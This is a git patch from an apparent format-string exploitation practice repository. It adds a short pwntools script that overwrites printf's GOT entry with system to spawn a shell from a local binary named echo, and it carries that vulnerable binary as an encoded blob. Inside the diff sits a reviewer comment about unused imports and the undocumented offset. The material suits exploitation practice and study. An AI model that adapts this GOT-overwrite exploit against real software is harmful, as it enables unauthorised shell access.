From 23eca8a37fe8b0aa384b14f12396c734ab3f5566 Mon Sep 17 00:00:00 2001
From: Jack Ren
Date: Tue, 14 Sep 2021 12:31:15 +0800
Subject: [PATCH] Finished format-string/echo
---
format-string/echo/answer_echo.py | 19 ++++++++++++++++
format-string/echo/echo | Bin 0 -> 7596 bytes
format-string/echo/test_echo.py | 35 ++++++++++++++++++++++++++++++
format-string/echo/test_echo.txt | 5 +++++
4 files changed, 59 insertions(+)
create mode 100755 format-string/echo/answer_echo.py
create mode 100755 format-string/echo/echo
create mode 100755 format-string/echo/test_echo.py
create mode 100644 format-string/echo/test_echo.txt
diff --git a/format-string/echo/answer_echo.py b/format-string/echo/answer_echo.py
new file mode 100755
index 0000000..68bdd59
--- /dev/null
+++ b/format-string/echo/answer_echo.py
@@ -0,0 +1,19 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math
+context(arch = "i386",os = "linux", log_level = "debug")
+
+p = process('./echo')
+elf = ELF('./echo')
+
+printf_got = elf.got['printf']
+system_plt = elf.plt['system']
+
+payload = fmtstr_payload(7, {printf_got: system_plt})
+
+p.sendline(payload)
+p.sendline("/bin/sh")
+p.interactive()
+
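Review bot: Three of the four import lines at the top of answer_echo.py bring in names the script never uses (`from LibcSearcher import *`, `from struct import pack`, `import os, base64, math`). `LibcSearcher` is a third-party package, so the script fails at import wherever it is not installed even though nothing below needs it; `from pwn import *` is the only import the visible code relies on. The literal `7` passed to `fmtstr_payload` is undocumented, and a comment such as `# 7: argument index of the input buffer, measured against this build of ./echo` would tell a reader that the value is tied to the committed binary. A short header comment should also record which hardening the practice binary is assumed to lack (presumably full RELRO and PIE, inferred from the GOT write and the fixed addresses rather than checked against the binary), so a reader knows which mitigations the exercise is about. The `python2` shebang pins the script to an interpreter that reached end of life in January 2020.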
diff --git a/format-string/echo/echo b/format-string/echo/echo new file mode 100755 index 0000000000000000000000000000000000000000..71e0963655fd352d51e50408f28fec77cbf62772 GIT binary patch literal 7596 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